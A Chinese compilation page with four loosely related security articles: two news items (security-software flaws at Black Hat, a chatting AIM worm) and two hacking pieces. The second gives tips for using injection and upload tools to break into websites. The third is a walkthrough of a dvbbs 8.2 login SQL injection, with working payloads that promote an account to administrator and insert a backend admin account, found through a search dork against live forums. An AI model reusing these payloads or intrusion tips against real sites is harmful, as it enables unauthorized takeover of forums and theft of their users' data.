安全软件也会存有漏洞

下面小编给大家整理了安全软件也会存有漏洞，本文共4篇，供大家阅读参考。本文原稿由网友“mocomichi”提供。

篇1：安全软件也会存有漏洞

据国外媒体报道，在周四的黑帽安全会议（Black Hat security conferenc）上，据相关安全软件专家透露，电脑中安装的反病毒流氓软件也会产生安全漏洞，同时该信息已经得到阿尔弗雷多.奥尔特加（Alfredo Ortega） 和阿尼瓦.尔萨科 （Anibal Sacco）两位资深安全专家的确认。

据核心安全公司的首席技术官伊万阿尔塞（Ivan Arce）分析，电脑感染某些恶意程序之后，就会传染到杀毒软件，干扰其发挥正常作用，从而 就获得了电脑掌控权。接着， 可以修改电脑的设置，甚至还可以将杀毒软件随意卸载。所以，即使用户预先安装某些安全软件，也无法保证电脑不被恶意软件侵袭，解决这个安全漏洞就成为当务之急。

对此，黑帽安全会议提出了最新的应对措施，即是使用温哥华一家软件公司（Absolute Software Corp）推出的一款最新的Comupturace软件，

Comupturace软件售价不菲，它被专门用来专门对付这种恶意程序。Comupturace软件在电脑未出厂时就预装在电脑的主板中，所以出厂后，即使专门卸载程序的软件也无法将它删除掉。

由于Comupturace软件的存在，某些数据就可以被远程地植入丢失的电脑中。随后电脑就会反馈相关的信息。

与此同时，伊万阿尔塞（Ivan Arce）还指出，只要用户掌握了正确的使用方法，那么用户自己也可以禁用该软件。他并没有透露更多的使用细节。

据悉，卡巴斯基实验室（Kaspersky Lab）的资深研究专家瑞尔舒文伯格 （Roel Schouwenberg）认为，从最根本的层面来看，这一次 攻击的方式其实和以往一样，仍是试图在用户下载过程中将恶意软件和恶意程序植入到电脑中去。高危漏洞的出现对网络安全说是一个极大的挑战。网民需要提高防范不明来源信息的警惕性。

篇2： 工具也会出错：安全检测要双管齐下

1.有的时候工具也会经常出错

例如注入工具检测注入点只是检测当前页面所有连接，并不能完全一个一个打开后进行检测，如果连接www.xxx.com/index.asp#是点击弹出窗口的，这样工具无法检测的，需要手动点击后 然后F11全屏 可以看到这个连接的真实地址，如 www.xxx.com/play.asp?id=1这样就能找到一个可尝试注入的连接了，

工具也会出错：安全检测要双管齐下

。

2.还有一些默认上传工具，之所以默认就是大多数是按照默认方式上传，但有的时候cookies信息也会改变的，虽然有漏洞，但是你默认上传就上传不进去了.所以就需要自己抓包 进行修改 来用NC上传 或工具修改cookies上传，

3.再就是一些批量检测工具，由于网络原因或其他原因。

检测时并不一定会完全的检测出来，例如有些批量注入工具，连接还没有读取完就检测完毕了，工具的速度超过了网络返回信息的速度，出现延时现象，还有例如一次批量检测默认数据库地址，工具检测了2遍，没检测出来，手动一下就试出来。

4.就是对一个站的检测，多换几个工具尝试，如果不行在手动。

5. 入侵站，最主要一点，不要轻易放弃.

工具也是人写出来的，也会经常出错，也会经常出现版本更新，之所以暂时电脑还没有代替人脑，说明电脑还处于不成熟阶段，暂时先讲这么多.等想到新的再说。

篇3：菜鸟也玩dvbbs 8.2 SQL注射漏洞脚本安全

水银[B.S.N]&[Z.S.T]

www.54hssy.cn（作者博客）

今天凌晨得到动网又出了漏洞，与和幻泉说了一下，经过这个牛人的分析其很快就将一个大站拿下于是身为菜鸟的我也不会放过这个机会就请教了他。下面先看看产生此漏洞的原因吧：

login.asp 118行左右

......

username=trim(Dvbbs.CheckStr(request(“username”)))

If ajaxPro Then username = unescape(username)

......

username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交’过去了.

中国应用最广泛的论坛程序，最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp

Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号，导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。

特别注意：admin等。。。必须在论坛有注册。。。

就是登陆名必须是已经在论坛注册了的。。

mssql数据库的进行测试，我构造了搜索语句“Powered By Dvbbs Version 8.2.0 填写登录信息”如图1：

forum.*******.net/首先注册一个帐户“heiseshuiyin”然后访问其登陆页面如图2：

heiseshuiyin' and 'a'='a”密码随便登陆看到其返回信息如图3：看用户名或密码不正确，然后我们在“heiseshuiyin' and 'a'='b”返回的信息如图4：很明显我们能发现第一次提交正确和第二次提交的不正确时两者返回的信息有着明显的差别，

就说明他是可以利用的。那我就来将我的帐户提升为管理员吧！在用户名处写入“';update dv_user set usergroupid=1 where username='heiseshuiyin'--”密码我就用正确的shuiyin来写然后写好后登陆看到反回的信息入图5：我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“heiseshuiyin”已经为管理员了。下面我们登陆看如图6、7：

login.asp这个登陆页面。在用户名处写入“shuiyin';insert into dv_admin (username,password,flag,adduser) values

('shuiyin','a5258dfb597d7a1a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,

24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','shuiyin')--”其中的“a5258dfb597d7a1a”是“shuiyin”的MD5加密后的值，也就是说我们这里提升为后台管理权限的帐户的后台管理密码为“shuiyin”。之后我们看看能否登陆后台，哈哈RP还行，成功了如图8、9：

webshell甚至提权了。这里我就不搞了（我没弄到这个站的所以没写出来PS：不要砸我！）

，至于ACCESS这个数据库的利用比较麻烦（本人比较懒就不搞了）就留给大家来玩吧！希望这篇菜鸟级的文章能给你一点收获。最后作个广告“我的BLOG：www.54hssy.cn”。

篇4：首种会聊天的蠕虫现身可关闭安全软件

计世网消息正在通过即时通讯服务与你聊天儿的可能是只蠕虫，

美国当地时间本周二，即时通讯安全专业厂商IMlogic公司警告称，针对AIM用户的一种新蠕虫被认为将是首款能够与用户聊天的蠕虫病毒，它能够诱惑用户激活一个恶意的负载。

据IMlogic称，这一名为IM.Myace0.AIM的蠕虫是随内容为“lolthatcool”的即时通讯消息传播的，其中包含一个指向恶意文件━━claria7.pif的链接。当用户响应这一消息，询问附件中是否包含有病毒时，该蠕虫会回答：“loloitotitavirus”(不，其中没有病毒)，

IMlogic表示，恶意代码能够关闭安全软件，安装后门儿软件，调整系统文件。然后，它就会故伎重演，试图向用户即时通讯服务好友列表中的其他用户传播。

IMlogic的产品管理主管安德鲁表示，这是第一种能够与用户聊天的病毒。他说，这一蠕虫的传播范围还不够广， 正在尝试这种新技术。我们会看到或个攻击实例，首先是小规模发作，然后就会大规模爆发。

包含即时通讯bot是即时通讯蠕虫正在越来越复杂的另一个迹象。在本周二发现的另一种蠕虫则采取了一种更传统的策略：伪装为圣诞贺卡传播。

安全专业人士建议，在点击即时通讯消息中的链接时，用户应当小心谨慎，即使是它似乎来自朋友，或者使用最新版本的反病毒软件。当在即时通讯消息中收到链接时，用户最好是首先向发送者验证是否发送了消息。

Win7堵住漏洞安全设置

正确运用软件 确保工程结构安全

安全生产研判会主持词

极点五笔输入法一个漏洞

网络精英培训网的漏洞

安全软件也会存有漏洞.doc

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档